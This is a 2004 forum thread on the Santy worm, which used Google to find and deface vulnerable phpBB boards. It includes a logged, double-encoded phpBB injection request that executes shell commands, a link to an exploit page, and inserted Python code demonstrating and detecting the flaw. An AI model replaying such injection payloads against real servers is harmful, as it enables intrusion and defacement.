
Net Worm Uses Google to Spread

troop23 writes "A web worm that identifies potential victims by searching Google is spreading among online bulletin boards using a vulnerable version of the program phpBB, security professionals said on Tuesday. Almost 40,000 sites may have already been infected. In an odd twist, using Microsoft's search engine to scan for the phrase 'NeverEverNoSanity' -- part of the defacement text that the Santy worm uses to replace files on infected Web sites -- returns nearly 39,000 hits." Reader pmf sent in a few more links with information: F-Secure weblog and Bugtraq posting. Update: 12/22 03:34 GMT by T : ZephyrXero links to this news.com article that says Google is now squashing requests generated by the worm.
  • by Meostro ( 788797 ) * on Tuesday December 21, 2004 @06:16PM (#11153153) Homepage Journal
    I saw this yesterday on a.... uhh... "anatomic reference" site:
    This site is defaced!!! NeverEverNoSanity WebWorm generation 10.

    I tried to find some kind of reference and Googled [google.com] for it, but I got no results.

    Still nothing on it, wonder how long it'll be before it shows up?

    MSN search [msn.com] returns 3 results, that's just a bit short of 39,000, so I guess they must be using the beta [msn.com] engine for the article.
  • I got hit HARD! :( (Score:5, Interesting)

    by Broadband ( 602443 ) on Tuesday December 21, 2004 @06:22PM (#11153238)
    This worm is unbelievably evil.

    What it does is search all volumes on the server for files with the .asp .php .shtml .html .htm extensions and overwrites them with the 264 byte file that simply states "Web site defaced".

    I had a backup drive with everything mirrored that was unshared and secure and it managed to overwrite my ENTIRE backup as well on that machine.

    I've been spending the past 24 hours picking up the pieces and trying to get everything back online. 1/2 Done now.

    If you want to see what a defaced website looks like go to: http://www.sherwoodoregon.com and check it out before I get that site back online.

    -BB
  • Re:NeverEverNoSanity (Score:1, Interesting)

    by Anonymous Coward on Tuesday December 21, 2004 @06:28PM (#11153298)
    That is only part of it. All the sites in MSN search are IIS sites. IIS actually sends info to MSN search (Whether you want it to or not). While IIS has a small % of the web, it is still some 20%.
  • Re:A few things.. (Score:2, Interesting)

    by psyon1 ( 572136 ) on Tuesday December 21, 2004 @06:39PM (#11153422) Homepage
    No, as someone else already responded to other posts, it is a phpBB problem. phpBB calls the urldecode() function on form variables, after PHP already does so. It allows ' to bypass the magic quotes that php so lovingly puts on all our form data. The latest bug reports were reported after the release of the exploit for phpBB 2.0.10 and earlier. IIRC the report said that some scripts MAY be vulnerable, but didn't state for certain. As far as I know, no one has yet released an exploit for the bugs, it's just a possibility.
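Added example (not code from the post, from phpBB or from PHP): a Python simulation of the decode-twice sequence psyon1 describes, so the bypass can be seen end to end. PHP decodes a query value once and magic quotes escape it; an application that then calls urldecode() again turns a harmless-looking "%27" remnant back into an unescaped quote. The function names (magic_quotes, php_receives, highlight_buggy, highlight_fixed, has_unescaped_quote) are hypothetical, and the magic-quotes emulation is a simplified stand-in for PHP 4's addslashes behaviour.

```python
import re
from urllib.parse import unquote


def magic_quotes(value: str) -> str:
    """Simplified emulation (assumption, not PHP's code) of magic_quotes_gpc:
    backslash-escape backslashes and both kinds of quote in request data."""
    return (value.replace("\\", "\\\\")
                 .replace("'", "\\'")
                 .replace('"', '\\"'))


def php_receives(raw_query_value: str) -> str:
    """What a PHP script sees: the web layer URL-decodes the value exactly
    once, then magic quotes escape whatever quotes that produced."""
    return magic_quotes(unquote(raw_query_value))


def highlight_buggy(raw_query_value: str) -> str:
    """The pattern the post describes: the application calls urldecode()
    again on data PHP has already decoded and escaped. A value that was
    double-encoded on the wire ("%2527") survives the escaping step as
    "%27" and only becomes a quote after the escaping has already run."""
    return unquote(php_receives(raw_query_value))


def highlight_fixed(raw_query_value: str) -> str:
    """Hardened variant: trust the single decode PHP already performed and
    never decode the value a second time."""
    return php_receives(raw_query_value)


# A single quote that is not preceded by a backslash, i.e. one that escaped
# the escaping.
UNESCAPED_QUOTE = re.compile(r"(?<!\\)'")


def has_unescaped_quote(value: str) -> bool:
    """True if the value still contains a quote magic quotes did not cover."""
    return UNESCAPED_QUOTE.search(value) is not None


if __name__ == "__main__":
    # "%27" is a normally encoded quote; "%2527" is the same quote encoded twice.
    for raw in ("%27", "%2527"):
        print(f"{raw:>6}  buggy={highlight_buggy(raw)!r:<6}"
              f"  unescaped={has_unescaped_quote(highlight_buggy(raw))}"
              f"  fixed={highlight_fixed(raw)!r}")
```

The takeaway for review work is that escaping applied before a later decoding step protects nothing; the defence is to decode input exactly once at the boundary and treat any further decoding in application code as a bug.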
  • Re:Quick! (Score:2, Interesting)

    by geekopus ( 130194 ) on Tuesday December 21, 2004 @06:44PM (#11153465)
    It might be quite the opposite:

    When I copied all these entries out of the log and translated the chr()
    calls, they turned out to be the attached perl script, which is capable
    of finding .html files to deface, and then going to google and finding
    more instances of phpbb to infect.

    This is from one of the links above. So, it sounds like if a machine doesn't have Perl installed, the thing can't go to work. By sheer coincidence, most windows boxes will be immune to this particular instance of this worm (by not having Perl installed).

    That's not to say that it can't be modified to carry a more portable payload. Thank god the payload wasn't itself written in PHP.
  • by falzbro ( 468756 ) on Tuesday December 21, 2004 @06:58PM (#11153607) Homepage
    I got this on a few servers yesterday- first thought it was related to the < PHP 4.3.10 bugs- it's not.

    This exploit is actually quite clever. It inputs values into the URL field that use the chr() function in PHP to pass text. It then writes its own perl script and executes it on the server.

    Here's the first line from the logfile:
    [20/Dec/2004:11:05:48 -0600] "GET /forum/viewtopic.php?p=738&sid=2db342b717c89bf9eca3ef07e4910bf6&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34))%252e%2527 HTTP/1.0" 200 22613 "http://example.com/forum/viewtopic.php?p=738&sid=2db342b717c89bf9eca3ef07e4910bf6&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34))%252e%2527" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

    If you decode the ascii characters [asciitable.com], you get:

    perl -e "open OUT,q(>m1ho2of) and print q(HYv9po4z3jjHWanN)"

    I didn't have enough free time to decode the whole thing due to.. actual work having to be done, but it's quite clever.

    --falz
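Added example, not falzbro's code and not the worm's: a small Python triage routine for the incident-response side of what the post describes. It pulls the request target out of each access-log line, decodes it twice (once as the web server does, once as the vulnerable application did), flags any PHP execution function being fed a chr()-built string, and spells out the chr() sequence for the analyst, the same manual step falzbro did by hand. The names triage_line, triage_log and decode_chr_sequence are assumptions; the sample log lines are constructed, the first reusing the request quoted above with its Referer field replaced by "-".

```python
import re
from urllib.parse import unquote

# Constructed sample lines. The first is the request quoted in the post above
# (Referer replaced by "-"); the second is an ordinary search on the same forum.
SAMPLE_LOG = [
    '[20/Dec/2004:11:05:48 -0600] "GET /forum/viewtopic.php?p=738&sid=2db342b717c89bf9eca3ef07e4910bf6&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34))%252e%2527 HTTP/1.0" 200 22613 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '[20/Dec/2004:11:06:02 -0600] "GET /forum/viewtopic.php?t=12&highlight=santy HTTP/1.0" 200 10432 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
]

# Request target of a combined-format log line: the token after GET/POST.
REQUEST_TARGET = re.compile(r'"(?:GET|POST)\s+(\S+)')
# A PHP execution function whose argument starts with chr() is never a
# legitimate value for a search/highlight parameter.
SUSPECT_CALL = re.compile(r"\b(system|passthru|exec|shell_exec)\s*\(\s*chr\(", re.I)
CHR_CALL = re.compile(r"chr\((\d{1,3})\)")


def decode_chr_sequence(fragment: str) -> str:
    """Turn chr(112).chr(101)... into the text it spells, in order."""
    return "".join(chr(int(n)) for n in CHR_CALL.findall(fragment))


def triage_line(line: str):
    """Return a finding for a suspicious request, or None for a clean line."""
    m = REQUEST_TARGET.search(line)
    if not m:
        return None
    target = m.group(1)
    once = unquote(target)   # what the web server hands to PHP
    twice = unquote(once)    # what a second urldecode() in the application yields
    hit = SUSPECT_CALL.search(twice)
    if not hit:
        return None
    return {
        "path": target.split("?", 1)[0],
        "function": hit.group(1).lower(),
        # Decode only from the flagged call onward so unrelated chr() text
        # elsewhere in the URL cannot pollute the result.
        "decoded_payload": decode_chr_sequence(twice[hit.start():]),
        # True when the value was encoded twice on the wire, the hallmark
        # of an attempt to slip past a single layer of decoding/escaping.
        "double_encoded": once != twice,
    }


def triage_log(lines):
    """Run triage_line over an iterable of log lines and keep the findings."""
    return [r for r in (triage_line(l) for l in lines) if r]


if __name__ == "__main__":
    for finding in triage_log(SAMPLE_LOG):
        print(finding)
```

Decoding twice is deliberate: a detector that decodes the request target only once sees "%27%2Esystem(chr(112)%2e..." and never matches the function name, which is exactly why the double-encoded form went past the escaping layer in the first place. On real logs, also count the distinct sources sending this pattern per hour; a self-propagating worm shows up as many unrelated client addresses issuing near-identical requests.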
  • Worm's genealogy? (Score:2, Interesting)

    by Azul ( 12241 ) on Tuesday December 21, 2004 @08:10PM (#11154248) Homepage

    Searching for "neverevernosanity webworm generation X" on MSN Beta Search [msn.com] yields the following number of results for each value of X:

    1: 0
    2: 0
    3: 0
    4: 2335
    5: 9297
    6: 7218
    7: 7288
    8: 10746
    9: 12009
    10: 11752
    11: 14866
    12: 13267
    13: 8393
    14: 13317
    15: 3840
    16: 5004
    17: 2032
    18: 3344
    19: 7
    20: 1
    21: 3
    22: 1
    23: 1
    24: 1
    25: 0

    Hmm, if these numbers are to be trusted, the infections are 10.5 generations old, on average.

    Interestingly, these numbers add to 124k, much more than the 39k pages reported by merely searching for "NeverEverNoSanity". This would imply that many of the defaced pages contain messages for different generations. Weird.

    It would be interesting if the defaced pages included the URL of the parent, the one that the worm used to infect the server from which it infected the current one.

  • by Chatmag ( 646500 ) <editor@chatmag.com> on Tuesday December 21, 2004 @10:09PM (#11155110) Homepage Journal
    http://www.hackgeneral.net/phpbb_exploit.php

    When I first saw that page a few days ago, it had several boxes for inputs, the site URL, code, and execute button. The page is now gone, and if someone speaks Spanish, please let us all know what the site is about.
